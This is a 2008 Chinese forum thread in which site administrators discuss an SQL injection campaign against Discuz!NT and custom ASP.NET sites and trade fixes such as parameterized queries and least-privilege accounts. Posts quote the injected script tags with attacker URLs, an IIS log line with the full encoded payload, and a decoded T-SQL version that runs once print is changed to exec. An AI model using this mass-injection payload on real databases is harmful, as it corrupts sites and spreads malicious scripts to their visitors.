ASP.net|论坛|个人空间|相册数据库遭到攻击求救雪人以及各路高手!

flower_fox - 2008-5-7 9:11:00

数据库遭到攻击

本人采用的是DISCUZ!NT1.1的SQL2000 数据库

数据库被黑很多表的字段的值后面被加上
</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!

多次修改数据库密码后仍然遭攻击
请问如何解决

戏水 - 2008-5-7 9:54:00

可能是您服务器安全做的不够好。建议您联络有经验的网管排查一下。堵住漏洞。

flower_fox - 2008-5-7 10:03:00

可是偏偏只有DISCUZ的这个数据库受到攻击

dean - 2008-5-7 10:19:00

我也同样被攻击了,大家知道是什么原因吗.

flower_fox - 2008-5-7 10:30:00

楼上什么时候遇到这个情况的?

flower_fox - 2008-5-7 10:31:00

楼上我是前天开始中招的
目前无解!

alanhang - 2008-5-7 10:43:00

自己用asp.net开发的网站，使用sql server 2005，昨天遇到类似的请况！
求救！

flower_fox - 2008-5-7 10:58:00

楼上用的是DONNET 1.1 还是2.0?

alanhang - 2008-5-7 11:21:00

DONNET 1.1

flower_fox - 2008-5-7 11:39:00

楼上描述一下你遇到的情况

alanhang - 2008-5-7 11:43:00

表的字段的值后面被加上
</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!

flower_fox - 2008-5-7 11:44:00

楼上没有装DISCUZ么?

appledd - 2008-5-7 15:40:00

我也求救呀...我们数据库也一样
5号被改成 </title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--
6号被改成 </title></pre>><script scr=http</title></pre>><script src=http://sb.5252.ws:88/107/1.js></script><
7号被改成 </title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
服务器没毒没木马.漏洞都有及时更新.偏偏数据库里一个中招.其他同样的没事..=.=实在是郁闷..求救呀...

redebug - 2008-5-7 17:57:00

打开论坛站点的IIS日志记录功能

数据库被修改后，仔细检查IIS日志，看看有没有特别长的页面请求地址

一般这样可以看出来是不是通过页面提交方式注入的，如果是，那就说明NT有漏洞

如果日志里没有发现

可能就是服务器安全出问题了

只是个建议

zxdjxx - 2008-5-7 22:46:00

我的也是一样的情况,晕死了

flower_fox - 2008-5-8 13:00:00

DISCUZ!NT1.1有漏洞

请楼上的都说明自己中招的版本极其情况

我已经查出问题所在请各位把你们的QQ号码发站内短讯给我!

melon134 - 2008-5-8 13:31:00

:_onion3:，不会是discuznt有漏洞把

aiouluosi - 2008-5-9 18:15:00

怎么还没有提供解决方案，急死人了。。。。:-|

jerry336 - 2008-5-9 19:46:00

我的也中了的类式的代码哈!我看了iis
记录如下:20:52 W3SVC965161196 125.65.46.56 GET /trav/storyfile.aspx fileid=1&recordid=51;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.241.156.204 Mozilla/4.0 302 0 0

jerry336 - 2008-5-9 19:50:00

我也中了几天了! 大侠们快现身吧!

netnice - 2008-5-11 14:29:00

我被注入攻击了两次! 查看了源码,怀疑是对注入字符没有检测和过虑

flower_fox - 2008-5-11 20:37:00

在此公布一下初步解决方案：

首先您自己编写的网站存在SQL注入攻击漏洞！
请将您的SQL代码编写成参数带入的形式例如：
SqlCommand cmd = new SqlCommand("insert into TABLE1(A,B,C,D,E,F,G) values(@A,@B,@C,0,'" + DateTime.Now + "',null,null)", con);
SqlParameter para = new SqlParameter("@A", SqlDbType.VarChar, 32);
para.Value = ca.A;
cmd.Parameters.Add(para);
para = new SqlParameter("@B", SqlDbType.VarChar, 32);
para.Value = ca.B;
cmd.Parameters.Add(para);
para = new SqlParameter("@C", SqlDbType.Int, 32);
para.Value = Convert.ToInt32(ca.C);
cmd.Parameters.Add(para);

页面接收的参数全部用这个形式拼接SQL，不然会导致SQL注入攻击！

我已经翻译了这类攻击的几个代码行，发现攻击者还是比较人道
没有删除大家的数据，这类攻击可以删除SQL2000对应数据库上的数据！
这次对方只是修改了！
在此不便公布攻击代码～～～希望大家赶紧补自己写的程序漏洞！

给QQ我短信的朋友我就不回复了呵呵

再则是否DISCUZ论坛模板也存在这种漏洞
我暂未测试明天有空我会测试一下！

两天内公布测试情况不过我估计DISCUZ模板这样的低级错误的可能性不大
主要还是各位写的代码部分的漏洞！:+

TSXMLOVE - 2008-5-12 9:36:00

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE TABLE_CURSOR CURSOR FOR
SELECT A.NAME,B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.XTYPE='U' AND (B.XTYPE=99 OR B.XTYPE=35 OR B.XTYPE=231 OR B.XTYPE=167)
OPEN TABLE_CURSOR
FETCH NEXT FROM TABLE_CURSOR
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
Print 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR,['+@C+']))+CAST(0X3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D AS VARCHAR(67))'
FETCH NEXT FROM TABLE_CURSOR
INTO @T,@C
END
CLOSE TABLE_CURSOR
DEALLOCATE TABLE_CURSOR;--
--EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR,['+@C+']))+CAST(0X3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D AS VARCHAR(67))')
--Print 'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR,['+@C+']))+CAST(0X3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D AS VARCHAR(67))'

大家好！
以上是偶对SQL注入分析得到的一段代码
可以在查询分析器运行一下
如果将print 改为exec
数据库就会被更新了耶:D

我哋公司都係出再哩個问题
喺我查看咗IIS日志后
入侵者係通过SQL注入方式而得逞嘅
解决办法最好是将所有的请求参数进行过滤
用最低权限的SQL帐户运行ASP程序
将有安全隐患的扩展存储过程禁用掉
我就是这样做的
暂时没什么大问题

flower_fox - 2008-5-12 22:12:00

楼上是玉泉路呀我也在玉泉路哦好巧啊！

perdu - 2008-5-13 9:34:00

关注

flower_fox - 2008-5-13 18:43:00

各位如有发现DISCUZ!NT1.1 BBS模板有哪个页面有漏洞的请告知！
我不想再被攻击了！
目前暂未发现漏洞～～～估计都是大家自己建的站点的SQL漏洞！:T

yzy8788 - 2008-5-27 15:08:00

楼上们的，你们的这个问题都解决了吗？
我的怎么还是不行啊？我自己些的程序我过滤了，注入不了了，可是我网站上面的nt论坛就遭殃了，一个被搞n次，我改过来他改过去的，有解决的能教一下怎么解决吗？
QQ：517449116

Discuz!NT官方社区